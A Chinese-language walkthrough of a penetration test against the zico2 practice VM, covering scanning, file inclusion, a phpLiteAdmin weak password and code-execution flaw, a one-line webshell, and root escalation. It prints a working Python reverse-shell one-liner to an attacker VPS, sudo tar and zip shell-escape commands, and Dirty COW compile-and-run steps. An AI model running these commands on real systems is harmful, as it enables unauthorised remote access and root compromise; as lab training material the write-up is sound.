【web安全】zico2靶机渗透

试验环境

靶机：zico2

攻击机：kali win10 vps

试验过程

使用arp-scan工具扫描内网存活主机，发现目标机器ip为172.20.10.8，使用nmap扫描其开放的端口有22、80和111端口

访问80端口的web服务，发现站点是php语言写的，发现有个页面在?page=tools.html

这里测试存在文件包含漏洞

使用dirsearch扫一手目录，发现存在一个dbadmin目录，访问一下看看

发现是phpLiteAdmin登录界面，版本为1.9.3，试了一下发现存在弱口令为admin

百度了一下phpLiteAdmin爆出过的历史漏洞，发现版本<=1.9.3存在代码执行漏洞，其利用方法就是创建一个.php的数据库，然后在该数据库表中插入一句话木马。

使用弱口令登录进去后，在这里发现了两个数据库账号密码，经解密为root--34kroot34和zico--zico2215@

利用思路1：直接使用ssh登录(失败了)

使用hydra进行验证，发现不行

利用思路2：利用代码执行写入一句话木马，文件包含进行漏洞利用

创建一个chan.php数据库，然后创建一个aaa表，插入一句话(这里插入$_POST也可以,但是我试了菜刀和冰蝎，可以连接上但多少都有点问题)

利用文件包含来执行命令

利用python反弹命令：

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx.xx.xx.xx',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

这里我使用了自己的vps来接收，然后使用python获取一个交互式shell

提权方法(sudo 提权)1：

查看/home/zico目录下的to_do.txt文件，提示查看目录joomla、bootstrsp和wordpress，在wordpres目录下的配置文件找到了zico的密码

切换到zico用户，使用sudo -l命令查看用户配置权限，发现可以无密码使用tar和zip命令

使用tar命令进行提权

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

使用zip命令进行提权

touch chansudo zip chan.zip chan -T --unzip-command="sh -c /bin/bash"

(linux命令提权辅助查询询:https://gtfobins.github.io/)

提权方法2(脏牛提权)：

将dirty.c文件放在vps的web服务下，在靶机上试验wget命令下载下来，

使用命令

gcc -pthread dirty.c -o dirty -lcrypt

进行编译

执行./dirty 密码即可提权成功

查看/etc/passwd文件，发现root用户被修改成了firefart用户，密码为chan

切换到fierfart用户，提权成功。